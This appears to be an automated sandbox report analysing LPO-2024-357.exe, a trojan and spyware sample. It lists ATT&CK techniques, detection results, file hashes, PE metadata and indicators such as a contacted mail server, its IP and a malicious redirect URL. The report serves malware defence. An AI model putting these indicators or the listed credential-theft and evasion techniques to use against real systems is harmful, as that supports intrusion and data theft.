                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.79a0000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LPO-2024-357.exe.2dac680.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1700975172.00000000079A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1694260808.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1690208458.0000000002B4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        111
                        Process Injection
                        1
                        Masquerading
                        2
                        OS Credential Dumping
                        111
                        Security Software Discovery
                        Remote Services1
                        Email Collection
                        1
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        DLL Side-Loading
                        11
                        Disable or Modify Tools
                        1
                        Credentials in Registry
                        1
                        Process Discovery
                        Remote Desktop Protocol11
                        Archive Collected Data
                        1
                        Non-Standard Port
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                        Virtualization/Sandbox Evasion
                        Security Account Manager141
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin Shares2
                        Data from Local System
                        1
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                        Process Injection
                        NTDS1
                        Application Window Discovery
                        Distributed Component Object ModelInput Capture11
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information
                        LSA Secrets1
                        File and Directory Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                        Obfuscated Files or Information
                        Cached Domain Credentials24
                        System Information Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                        Software Packing
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Timestomp
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        DLL Side-Loading
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        LPO-2024-357.exe63%ReversingLabsByteCode-MSIL.Trojan.Remcos
                        LPO-2024-357.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        mail.mbarieservicesltd.com
                        199.79.62.115
                        truefalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.apache.org/licenses/LICENSE-2.0LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.comLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.com/designersGLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designers/?LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bTheLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers?LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.tiro.comLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designersLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.goodfont.co.krLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.carterandcone.comlLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.sajatypeworks.comLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.typography.netDLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designers/cabarga.htmlNLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cn/cTheLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.galapagosdesign.com/staff/dennis.htmLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.founder.com.cn/cnLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.fontbureau.com/designers/frere-user.htmlLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.jiyu-kobo.co.jp/LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.galapagosdesign.com/DPleaseLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.fontbureau.com/designers8LPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.fonts.comLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.sandoll.co.krLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.urwpp.deDPleaseLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.zhongyicts.com.cnLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLPO-2024-357.exe, 00000000.00000002.1690208458.0000000002B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.sakkal.comLPO-2024-357.exe, 00000000.00000002.1699319889.0000000007142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://mail.mbarieservicesltd.comLPO-2024-357.exe, 00000004.00000002.2923605654.000000000287A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                199.79.62.115
                                                                                mail.mbarieservicesltd.comUnited States
                                                                                394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1565672
                                                                                Start date and time:2024-11-30 14:17:05 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 5m 27s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:10
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:LPO-2024-357.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@7/6@3/1
                                                                                EGA Information:
                                                                                • Successful, ratio: 100%
                                                                                HCA Information:
                                                                                • Successful, ratio: 100%
                                                                                • Number of executed functions: 47
                                                                                • Number of non-executed functions: 14
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • VT rate limit hit for: LPO-2024-357.exe
                                                                                TimeTypeDescription
                                                                                08:17:54API Interceptor77x Sleep call for process: LPO-2024-357.exe modified
                                                                                08:17:57API Interceptor14x Sleep call for process: powershell.exe modified
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                199.79.62.115Quote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                  Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                    Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      PO ALJAT-5804-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        INQ#84790.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          LPO24.0524.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            1364. 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              Quote_220072.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                TT Copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                  24-17745.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    mail.mbarieservicesltd.comQuote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                    • 199.79.62.115
                                                                                                    Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                    • 199.79.62.115
                                                                                                    Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    PO ALJAT-5804-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    INQ#84790.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    LPO24.0524.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    1364. 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    Quote_220072.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    PUBLIC-DOMAIN-REGISTRYUSRFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                    • 162.251.80.30
                                                                                                    Quote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                    • 199.79.62.115
                                                                                                    Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                    • 199.79.62.115
                                                                                                    shipping doc -GY298035826.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                    • 162.251.80.30
                                                                                                    New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 208.91.199.225
                                                                                                    Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 199.79.63.24
                                                                                                    Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 199.79.63.24
                                                                                                    https://www.google.com.bn/url?snf=vpsBrmjsMjZT0YKBELze&nuu=B4grUxP5T5pV5xJiiFp0&sa=t&ndg=e2p4qPDSQqlwr77oflqr&pdbr=npO0StsDFHvGF7jwYfWY&np=slEjuRPdabbflvaXgHau&cb=IhzFYfcuqq5m2vva4DTH&url=amp%2Fbeutopiantech.com%2Fchd%2FroghgehdjtiE-SURECHDDam9lbC5kZW5vZnJpb0BoYW5lc2NvbXBhbmllcy5jb20=Get hashmaliciousUnknownBrowse
                                                                                                    • 103.211.216.144
                                                                                                    Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 199.79.62.115
                                                                                                    DOCS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 207.174.215.249
                                                                                                    No context
                                                                                                    No context
                                                                                                    Process:C:\Users\user\Desktop\LPO-2024-357.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1415
                                                                                                    Entropy (8bit):5.352427679901606
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                                                                    MD5:97AD91F1C1F572C945DA12233082171D
                                                                                                    SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                                                                    SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                                                                    SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                                                                    Malicious:true
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2232
                                                                                                    Entropy (8bit):5.380805901110357
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZWUyus:lGLHyIFKL3IZ2KRH9Ougws
                                                                                                    MD5:3E0907D635C949F64B277F168B031CA0
                                                                                                    SHA1:6ACE55DEFBB979521973A6C12F757FB625E07F43
                                                                                                    SHA-256:CDA30176C42A540618AE4D4FDB9576EA2319843D9D2ED19DF04EEA27E727A0E9
                                                                                                    SHA-512:5364F45AF3BCEAB75C1E991B58904594B48ED39393E2F5BA6F4DF9E4951BFC5C16686CD20E636B403BDF9F131EDC0D97B50CD2E2BFB3F0538316611AD42033AA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):7.654021735538355
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    File name:LPO-2024-357.exe
                                                                                                    File size:709'120 bytes
                                                                                                    MD5:b15e3e1eb0abfb4967c65bf33665fcbb
                                                                                                    SHA1:fcd702629c1e38b7d08df3628920c22d4dab9a40
                                                                                                    SHA256:137e0a944efefef514d0595cdfade088a59eb12404a1469e76cd024ebdb2d1f1
                                                                                                    SHA512:b4bbcda8556f487ec07b4c95cfb9a0627418107a62d70cdbdb293048e3483441f4a45cf36bdbfcf44a9cfe7f348a53a39f8f668fd8ee98aac81cf32be593d820
                                                                                                    SSDEEP:12288:sF2iNCTsv+SGjpA3yKUUo6aZ9p71raSBSf3t5Nppl1MakspSrZhA/9JQZsGoIU/:G1M1xjj9p7F8HjB0NhA/9WsGS
                                                                                                    TLSH:68E4F11032AAEA06D5D60BB80972D2B45779AE8E6511C30F5FE67EFF3C3AB052544363
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.s...............0.................. ........@.. .......................@............@................................
                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                    Entrypoint:0x4ae6d2
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0xD373E82A [Tue Jun 2 01:17:30 2082 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xae67f0x4f.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x5d4.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xaccfc0x70.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
